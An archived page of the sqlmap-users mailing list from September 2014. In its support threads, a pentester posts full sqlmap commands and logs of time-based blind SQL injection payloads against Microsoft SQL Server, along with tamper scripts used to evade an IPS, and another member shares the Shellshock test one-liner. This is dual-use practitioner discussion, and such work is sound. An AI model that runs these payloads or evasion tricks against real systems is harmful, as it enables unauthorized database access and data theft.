sqlmap-users Mailing List for sqlmap (Page 19)

Brought to you by: inquisb

sqlmap-users — sqlmap users mailing list

You can subscribe to this list here.

2008	Jan	Feb	Mar	Apr	May	Jun	Jul	Aug	Sep (4)	Oct (11)	Nov (24)	Dec (13)
2009	Jan (23)	Feb (17)	Mar (13)	Apr (48)	May (22)	Jun (18)	Jul (22)	Aug (13)	Sep (23)	Oct (6)	Nov (11)	Dec (25)
2010	Jan (21)	Feb (33)	Mar (61)	Apr (47)	May (48)	Jun (30)	Jul (24)	Aug (37)	Sep (52)	Oct (59)	Nov (32)	Dec (57)
2011	Jan (166)	Feb (93)	Mar (65)	Apr (117)	May (87)	Jun (124)	Jul (102)	Aug (78)	Sep (65)	Oct (22)	Nov (71)	Dec (79)
2012	Jan (93)	Feb (55)	Mar (45)	Apr (49)	May (56)	Jun (93)	Jul (95)	Aug (42)	Sep (26)	Oct (36)	Nov (32)	Dec (46)
2013	Jan (36)	Feb (78)	Mar (38)	Apr (57)	May (35)	Jun (39)	Jul (23)	Aug (33)	Sep (28)	Oct (38)	Nov (22)	Dec (16)
2014	Jan (33)	Feb (23)	Mar (41)	Apr (29)	May (12)	Jun (20)	Jul (21)	Aug (23)	Sep (18)	Oct (34)	Nov (12)	Dec (39)
2015	Jan (2)	Feb (51)	Mar (10)	Apr (28)	May (9)	Jun (22)	Jul (32)	Aug (35)	Sep (29)	Oct (50)	Nov (8)	Dec (2)
2016	Jan (8)	Feb (2)	Mar (3)	Apr (14)	May	Jun	Jul	Aug (12)	Sep	Oct	Nov (1)	Dec (19)
2017	Jan	Feb (18)	Mar	Apr (1)	May	Jun	Jul	Aug (4)	Sep	Oct	Nov (2)	Dec
2018	Jan	Feb	Mar (1)	Apr (1)	May (3)	Jun	Jul	Aug	Sep	Oct	Nov	Dec
2019	Jan	Feb	Mar	Apr (3)	May	Jun	Jul	Aug	Sep	Oct	Nov	Dec

Flat | Threaded

<< < 1 .. 17 18 19 20 21 .. 145 > >> (Page 19 of 145)

Re: [sqlmap-users] SQLMAP ERROR, SQLmap disappearing

From: Miroslav S. <mir...@gm...> - 2014-09-30 09:22:20

http://sourceforge.net/p/sqlmap/mailman/sqlmap-users/thread/51E...@gm.../

Bye

On Tue, Sep 30, 2014 at 10:39 AM, Ogunwede Stephen <vor...@gm...>
wrote:

> Hello,
> I installed smtpmap, but it keeps disappearing each time i press enter.
>
> Also i have this error on it
>
> sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c,
> --wizard, --update, --purge-output or --dependencies), use -h for
> basic or -hh for advanced
>
>
> My operating system is 32bit Window 7
>
>
> please can you tell me what is wrong.
>
> Thanks
>
>
> ------------------------------------------------------------------------------
> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] SQLMAP ERROR, SQLmap disappearing

From: Ogunwede S. <vor...@gm...> - 2014-09-30 08:39:17

Hello,
I installed smtpmap, but it keeps disappearing each time i press enter.

Also i have this error on it

sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c,
--wizard, --update, --purge-output or --dependencies), use -h for
basic or -hh for advanced


My operating system is 32bit Window 7


please can you tell me what is wrong.

Thanks

Re: [sqlmap-users] varnish.py not working?

From: Miroslav S. <mir...@gm...> - 2014-09-29 12:06:48

Hi.

Not able to reproduce with options you've given:

~/Dropbox/Work/sqlmap$ python sqlmap.py -u "http://trololo.cu.cc/?id=1"
--tamper=varnish.py
         _
 ___ ___| |_____ ___ ___  {1.0-dev-1e636fb}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 13:57:00

[13:57:00] [INFO] loading tamper script 'varnish'
[13:57:01] [INFO] testing connection to the target URL

....

Please remove everything from your sqlmap directory and clone it from
beginning from our GitHub repository.

Bye


On Mon, Sep 29, 2014 at 6:35 AM, Fjodor Kozlov <fj...@gm...> wrote:

> Hi.
>
> When trying to pass --tamper=varnish.py the following error is returend:
>
> [CRITICAL] missing function 'detect(page, headers, code)' in WAF script
> '/opt/sqlmap/waf/varnish.py'
>
> Latest version installed tonight from GIT.
>
> Is this a bug or is there something im doing wrong? Other scripts are
> running fine(atleast the ones I''ve tried sofar).
>
> Br
> fjodork
>
>
> ------------------------------------------------------------------------------
> Slashdot TV.  Videos for Nerds.  Stuff that Matters.
>
> http://pubads.g.doubleclick.net/gampad/clk?id=160591471&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] varnish.py not working?

From: Fjodor K. <fj...@gm...> - 2014-09-29 04:35:48

Hi.

When trying to pass --tamper=varnish.py the following error is returend:

[CRITICAL] missing function 'detect(page, headers, code)' in WAF script
'/opt/sqlmap/waf/varnish.py'

Latest version installed tonight from GIT.

Is this a bug or is there something im doing wrong? Other scripts are
running fine(atleast the ones I''ve tried sofar).

Br
fjodork

[sqlmap-users] And.. What about the Shellshock?

From: Rodrigo Z. S. <rod...@gm...> - 2014-09-26 02:15:50

It is not everyday you see a soo big bug and it has even a wiki page. :D
Just for fun, my bash is vulnerable! lol

So... Why not use it? Anyone that have access in bash in your atack, have
fun!

See the article in wikipedia:
http://en.wikipedia.org/wiki/Shellshock_(software_bug)

Just run this line in your bash! After the upgrade, it will not work more :(

env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'

Re: [sqlmap-users] number of databases/tables problems

From: Miroslav S. <mir...@gm...> - 2014-09-25 19:11:21

As Rodrigo stated correctly, you can use -C to specify column names
manually.

For forcing sqlmap to requery certain results you can use --fresh-queries.

Bye

p.s. thx for donation :)
p.p.s. I am glad that you managed to use tamper scripts to bypass IPS/WAF
On Sep 25, 2014 8:04 PM, "Rodrigo Zanatta Silva" <
rod...@gm...> wrote:

> well, about the column, it is possible, I think, use the
>
>>     -D DB               DBMS database to enumerate
>>     -T TBL              DBMS database table(s) to enumerate
>>     -C COL              DBMS database table column(s) to enumerate
>>     -X EXCLUDECOL       DBMS database table column(s) to not enumerate
>>     -U USER             DBMS user to enumerate
>
> I really think the -C will search your column. There are a brutal force
> for common column (or was table?) Anyway, set your colum and it will
> accept.
>
> 2014-09-25 10:17 GMT-03:00 floyd <flo...@ya...>:
>
>> Hi Miroslav
>>
>> Thanks for your time and for sqlmap. I hope you got the donation :)
>>
>> By now I figured out what it was: an IPS. Had to
>> --tamper=caseselect,charencode where caseselect is just a simple
>> .replace("SELECT","sElEcT"). What a stupid IPS.
>>
>> Is there any way to correct errors that sqlmap is getting? I sometimes
>> have an extra character at the end of table names and would like to
>> correct that.
>>
>> And: Is there a possibility to tell sqlmap manually, which columns a
>> table has? That would be very helpful for blind time based, because,
>> well, it takes forever :)
>>
>> Btw. awesome resume feature on ^C !
>>
>> Best,
>> floyd
>>
>> On 24/09/14 13:03, Miroslav Stampar wrote:
>> > Hi.
>> >
>> > This looks like a permission problem while reading system tables. That
>> > would explain why DB_NAME() works and everything else fails.
>> >
>> > Bye
>> >
>> > On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...
>> > <mailto:flo...@ya...>> wrote:
>> >
>> >     Hi everybody
>> >
>> >     I'm doing a Pentest and I'm able to do a time based blind sql
>> injection
>> >     on a very big database.
>> >
>> >     It takes some time, but that's fine for now. But sqlmap is failing
>> when
>> >     it comes to retrieving the *number of [databases, tables, columns,
>> >     whatever]*:
>> >
>> >     $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p
>> "redactedParameter"
>> >     --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
>> >     Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
>> >     --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
>> >     --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
>> >     [...snip...]
>> >     [11:57:49] [INFO] confirming Microsoft SQL Server
>> >     [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
>> >     web server operating system: Windows
>> >     web application technology: ASP.NET <http://ASP.NET>, ASP.NET
>> >     <http://ASP.NET> 2.X.XXXXX (redacted)
>> >     back-end DBMS: Microsoft SQL Server 2008
>> >     [11:57:49] [INFO] fetching database names
>> >     [11:57:49] [INFO] fetching number of databases
>> >     [11:57:49] [WARNING] multi-threading is considered unsafe in
>> time-based
>> >     data retrieval. Going to switch it off automatically
>> >     [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> >     master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
>> >     [11:57:49] [WARNING] time-based comparison requires larger
>> statistical
>> >     model, please wait..............................
>> >     [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> >     master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
>> >     [11:58:25] [WARNING] it is very important not to stress the network
>> >     adapter during usage of time-based payloads to prevent potential
>> errors
>> >     [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> >     master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
>> >     [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32))
>> FROM
>> >     master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
>> >     [11:59:55] [INFO] retrieved:
>> >     [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
>> >     [11:59:55] [WARNING] in case of continuous data retrieval problems
>> you
>> >     are advised to try a switch '--no-cast' or switch '--hex'
>> >     [11:59:55] [ERROR] unable to retrieve the number of databases
>> >
>> >     However, for the *database names* sqlmap will continue with the
>> >     DB_NAME(X) technique. Right now it is dumping out all the different
>> >     database names, which works fine:
>> >
>> >     [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >     ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
>> >     WAITFOR DELAY '0:0:2'; --
>> >
>> >     Because I got many of the following errors (and the occurence of the
>> >     error is random), I patched the time delay in the python code to be
>> >     fixed to 2 seconds (maybe you want to have an option for that):
>> >
>> >     [15:03:14] [ERROR] invalid character detected. retrying..
>> >     [15:03:14] [WARNING] increasing time delay to 3 seconds
>> >
>> >     That works fine and I get good results. However, when I try to dump
>> >     table names now (from one of the known databases) with the -D
>> DB_NAME
>> >     and --tables switch, it is again failing to retrieve the number of
>> >     tables:
>> >
>> >     [14:51:53] [INFO] fetching tables for database: DB_NAME
>> >     [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
>> >     [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:51:53] [WARNING] time-based comparison requires larger
>> statistical
>> >     model, please wait..............................
>> >     [14:52:26] [CRITICAL] considerable lagging has been detected in
>> >     connection response(s). Please use as high value for option
>> '--time-sec'
>> >     as possible (e.g. 10 or more)
>> >     [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:52:56] [WARNING] it is very important not to stress the network
>> >     adapter during usage of time-based payloads to prevent potential
>> errors
>> >     [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>> >
>>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
>> DB_NAME..sysobjects
>> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
>> >     WAITFOR DELAY '0:0:10'; --
>> >     [14:54:56] [INFO] retrieved:
>> >     [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
>> >     [...]
>> >     [14:57:27] [INFO] retrieved:
>> >     [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
>> >     [...]
>> >     [14:59:57] [INFO] retrieved:
>> >     [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
>> >     [14:59:57] [WARNING] unable to retrieve the number of tables for
>> >     database 'DB_NAME'
>> >     [14:59:57] [CRITICAL] unable to retrieve the tables for any database
>> >
>> >     Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
>> >     help. Using --start and --stop also didn't work. I can't get any
>> data
>> >     out of it like this.
>> >
>> >     Best regards,
>> >     floyd
>> >
>> >
>>  ------------------------------------------------------------------------------
>> >     Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>> >     Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS
>> Reports
>> >     Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>> >     Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>> >
>> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>> >     _______________________________________________
>> >     sqlmap-users mailing list
>> >     sql...@li...
>> >     <mailto:sql...@li...>
>> >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
>> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
>> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
>> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>

Re: [sqlmap-users] number of databases/tables problems

From: Rodrigo Z. S. <rod...@gm...> - 2014-09-25 18:04:10

well, about the column, it is possible, I think, use the

>     -D DB               DBMS database to enumerate
>     -T TBL              DBMS database table(s) to enumerate
>     -C COL              DBMS database table column(s) to enumerate
>     -X EXCLUDECOL       DBMS database table column(s) to not enumerate
>     -U USER             DBMS user to enumerate

I really think the -C will search your column. There are a brutal force for
common column (or was table?) Anyway, set your colum and it will accept.

2014-09-25 10:17 GMT-03:00 floyd <flo...@ya...>:

> Hi Miroslav
>
> Thanks for your time and for sqlmap. I hope you got the donation :)
>
> By now I figured out what it was: an IPS. Had to
> --tamper=caseselect,charencode where caseselect is just a simple
> .replace("SELECT","sElEcT"). What a stupid IPS.
>
> Is there any way to correct errors that sqlmap is getting? I sometimes
> have an extra character at the end of table names and would like to
> correct that.
>
> And: Is there a possibility to tell sqlmap manually, which columns a
> table has? That would be very helpful for blind time based, because,
> well, it takes forever :)
>
> Btw. awesome resume feature on ^C !
>
> Best,
> floyd
>
> On 24/09/14 13:03, Miroslav Stampar wrote:
> > Hi.
> >
> > This looks like a permission problem while reading system tables. That
> > would explain why DB_NAME() works and everything else fails.
> >
> > Bye
> >
> > On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...
> > <mailto:flo...@ya...>> wrote:
> >
> >     Hi everybody
> >
> >     I'm doing a Pentest and I'm able to do a time based blind sql
> injection
> >     on a very big database.
> >
> >     It takes some time, but that's fine for now. But sqlmap is failing
> when
> >     it comes to retrieving the *number of [databases, tables, columns,
> >     whatever]*:
> >
> >     $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p
> "redactedParameter"
> >     --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
> >     Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
> >     --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
> >     --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
> >     [...snip...]
> >     [11:57:49] [INFO] confirming Microsoft SQL Server
> >     [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
> >     web server operating system: Windows
> >     web application technology: ASP.NET <http://ASP.NET>, ASP.NET
> >     <http://ASP.NET> 2.X.XXXXX (redacted)
> >     back-end DBMS: Microsoft SQL Server 2008
> >     [11:57:49] [INFO] fetching database names
> >     [11:57:49] [INFO] fetching number of databases
> >     [11:57:49] [WARNING] multi-threading is considered unsafe in
> time-based
> >     data retrieval. Going to switch it off automatically
> >     [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> >     master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
> >     [11:57:49] [WARNING] time-based comparison requires larger
> statistical
> >     model, please wait..............................
> >     [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> >     master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
> >     [11:58:25] [WARNING] it is very important not to stress the network
> >     adapter during usage of time-based payloads to prevent potential
> errors
> >     [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> >     master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
> >     [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> >     master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
> >     [11:59:55] [INFO] retrieved:
> >     [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
> >     [11:59:55] [WARNING] in case of continuous data retrieval problems
> you
> >     are advised to try a switch '--no-cast' or switch '--hex'
> >     [11:59:55] [ERROR] unable to retrieve the number of databases
> >
> >     However, for the *database names* sqlmap will continue with the
> >     DB_NAME(X) technique. Right now it is dumping out all the different
> >     database names, which works fine:
> >
> >     [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >     ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
> >     WAITFOR DELAY '0:0:2'; --
> >
> >     Because I got many of the following errors (and the occurence of the
> >     error is random), I patched the time delay in the python code to be
> >     fixed to 2 seconds (maybe you want to have an option for that):
> >
> >     [15:03:14] [ERROR] invalid character detected. retrying..
> >     [15:03:14] [WARNING] increasing time delay to 3 seconds
> >
> >     That works fine and I get good results. However, when I try to dump
> >     table names now (from one of the known databases) with the -D DB_NAME
> >     and --tables switch, it is again failing to retrieve the number of
> >     tables:
> >
> >     [14:51:53] [INFO] fetching tables for database: DB_NAME
> >     [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
> >     [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
> >     WAITFOR DELAY '0:0:10'; --
> >     [14:51:53] [WARNING] time-based comparison requires larger
> statistical
> >     model, please wait..............................
> >     [14:52:26] [CRITICAL] considerable lagging has been detected in
> >     connection response(s). Please use as high value for option
> '--time-sec'
> >     as possible (e.g. 10 or more)
> >     [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
> >     WAITFOR DELAY '0:0:10'; --
> >     [14:52:56] [WARNING] it is very important not to stress the network
> >     adapter during usage of time-based payloads to prevent potential
> errors
> >     [14:53:26] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
> >
>  master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
> >     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM
> DB_NAME..sysobjects
> >     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>101)
> >     WAITFOR DELAY '0:0:10'; --
> >     [14:54:56] [INFO] retrieved:
> >     [14:54:56] [DEBUG] performed 5 queries in 183.70 seconds
> >     [...]
> >     [14:57:27] [INFO] retrieved:
> >     [14:57:27] [DEBUG] performed 5 queries in 150.30 seconds
> >     [...]
> >     [14:59:57] [INFO] retrieved:
> >     [14:59:57] [DEBUG] performed 5 queries in 150.26 seconds
> >     [14:59:57] [WARNING] unable to retrieve the number of tables for
> >     database 'DB_NAME'
> >     [14:59:57] [CRITICAL] unable to retrieve the tables for any database
> >
> >     Any suggestions? Using higher --time-sec, --hex or --no-cast didn't
> >     help. Using --start and --stop also didn't work. I can't get any data
> >     out of it like this.
> >
> >     Best regards,
> >     floyd
> >
> >
>  ------------------------------------------------------------------------------
> >     Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> >     Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS
> Reports
> >     Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> >     Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
> >
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> >     _______________________________________________
> >     sqlmap-users mailing list
> >     sql...@li...
> >     <mailto:sql...@li...>
> >     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>
>
>
> ------------------------------------------------------------------------------
> Meet PCI DSS 3.0 Compliance Requirements with EventLog Analyzer
> Achieve PCI DSS 3.0 Compliant Status with Out-of-the-box PCI DSS Reports
> Are you Audit-Ready for PCI DSS 3.0 Compliance? Download White paper
> Comply to PCI DSS 3.0 Requirement 10 and 11.5 with EventLog Analyzer
>
> http://pubads.g.doubleclick.net/gampad/clk?id=154622311&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] number of databases/tables problems

From: floyd <flo...@ya...> - 2014-09-25 13:17:45

Hi Miroslav

Thanks for your time and for sqlmap. I hope you got the donation :)

By now I figured out what it was: an IPS. Had to
--tamper=caseselect,charencode where caseselect is just a simple
.replace("SELECT","sElEcT"). What a stupid IPS.

Is there any way to correct errors that sqlmap is getting? I sometimes
have an extra character at the end of table names and would like to
correct that.

And: Is there a possibility to tell sqlmap manually, which columns a
table has? That would be very helpful for blind time based, because,
well, it takes forever :)

Btw. awesome resume feature on ^C !

Best,
floyd

On 24/09/14 13:03, Miroslav Stampar wrote:
> Hi.
> 
> This looks like a permission problem while reading system tables. That
> would explain why DB_NAME() works and everything else fails.
> 
> Bye
> 
> On Sep 23, 2014 4:27 PM, "floyd" <flo...@ya...
> <mailto:flo...@ya...>> wrote:
> 
>     Hi everybody
> 
>     I'm doing a Pentest and I'm able to do a time based blind sql injection
>     on a very big database.
> 
>     It takes some time, but that's fine for now. But sqlmap is failing when
>     it comes to retrieving the *number of [databases, tables, columns,
>     whatever]*:
> 
>     $ /opt/sqlmap-dev/sqlmap.py -r http_req1_v2.txt -p "redactedParameter"
>     --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
>     Gecko/20100101 Firefox/32.0" --level=5 --risk=3 --dbms=MSSQL
>     --os=Windows --suffix="; --" --prefix="';" --technique=T -v 3
>     --time-sec=2 --proxy socks5://localhost:5050 --dbs -o
>     [...snip...]
>     [11:57:49] [INFO] confirming Microsoft SQL Server
>     [11:57:49] [INFO] the back-end DBMS is Microsoft SQL Server
>     web server operating system: Windows
>     web application technology: ASP.NET <http://ASP.NET>, ASP.NET
>     <http://ASP.NET> 2.X.XXXXX (redacted)
>     back-end DBMS: Microsoft SQL Server 2008
>     [11:57:49] [INFO] fetching database names
>     [11:57:49] [INFO] fetching number of databases
>     [11:57:49] [WARNING] multi-threading is considered unsafe in time-based
>     data retrieval. Going to switch it off automatically
>     [11:57:49] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>     master..sysdatabases),1,1))>51) WAITFOR DELAY '0:0:2'; --
>     [11:57:49] [WARNING] time-based comparison requires larger statistical
>     model, please wait..............................
>     [11:58:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>     master..sysdatabases),1,1))>54) WAITFOR DELAY '0:0:2'; --
>     [11:58:25] [WARNING] it is very important not to stress the network
>     adapter during usage of time-based payloads to prevent potential errors
>     [11:58:55] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>     master..sysdatabases),1,1))>56) WAITFOR DELAY '0:0:2'; --
>     [11:59:25] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>     master..sysdatabases),1,1))>57) WAITFOR DELAY '0:0:2'; --
>     [11:59:55] [INFO] retrieved:
>     [11:59:55] [DEBUG] performed 4 queries in 126.19 seconds
>     [11:59:55] [WARNING] in case of continuous data retrieval problems you
>     are advised to try a switch '--no-cast' or switch '--hex'
>     [11:59:55] [ERROR] unable to retrieve the number of databases
> 
>     However, for the *database names* sqlmap will continue with the
>     DB_NAME(X) technique. Right now it is dumping out all the different
>     database names, which works fine:
> 
>     [15:08:34] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     ISNULL(CAST(DB_NAME(110) AS NVARCHAR(4000)),CHAR(32))),16,1))!=109)
>     WAITFOR DELAY '0:0:2'; --
> 
>     Because I got many of the following errors (and the occurence of the
>     error is random), I patched the time delay in the python code to be
>     fixed to 2 seconds (maybe you want to have an option for that):
> 
>     [15:03:14] [ERROR] invalid character detected. retrying..
>     [15:03:14] [WARNING] increasing time delay to 3 seconds
> 
>     That works fine and I get good results. However, when I try to dump
>     table names now (from one of the known databases) with the -D DB_NAME
>     and --tables switch, it is again failing to retrieve the number of
>     tables:
> 
>     [14:51:53] [INFO] fetching tables for database: DB_NAME
>     [14:51:53] [INFO] fetching number of tables for database 'DB_NAME'
>     [14:51:53] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>66)
>     WAITFOR DELAY '0:0:10'; --
>     [14:51:53] [WARNING] time-based comparison requires larger statistical
>     model, please wait..............................
>     [14:52:26] [CRITICAL] considerable lagging has been detected in
>     connection response(s). Please use as high value for option '--time-sec'
>     as possible (e.g. 10 or more)
>     [14:52:56] [PAYLOAD] '; IF(UNICODE(SUBSTRING((SELECT
>     master.dbo.fn_varbintohexstr(CAST(ISNULL(CAST(LTRIM(STR(COUNT(name))) AS
>     NVARCHAR(4000)),CHAR(32)) AS VARBINARY(8000))) FROM DB_NAME..sysobjects
>     WHERE DB_NAME..sysobjects.xtype IN (CHAR(117),CHAR(118))),1,1))>97)
>     WAITFOR DELAY '0:0:10'; --
>     [14:52:56] [WARNING] it is very important not to stress the network
>     adapter during usage of time-based payloads to prevent potential errors
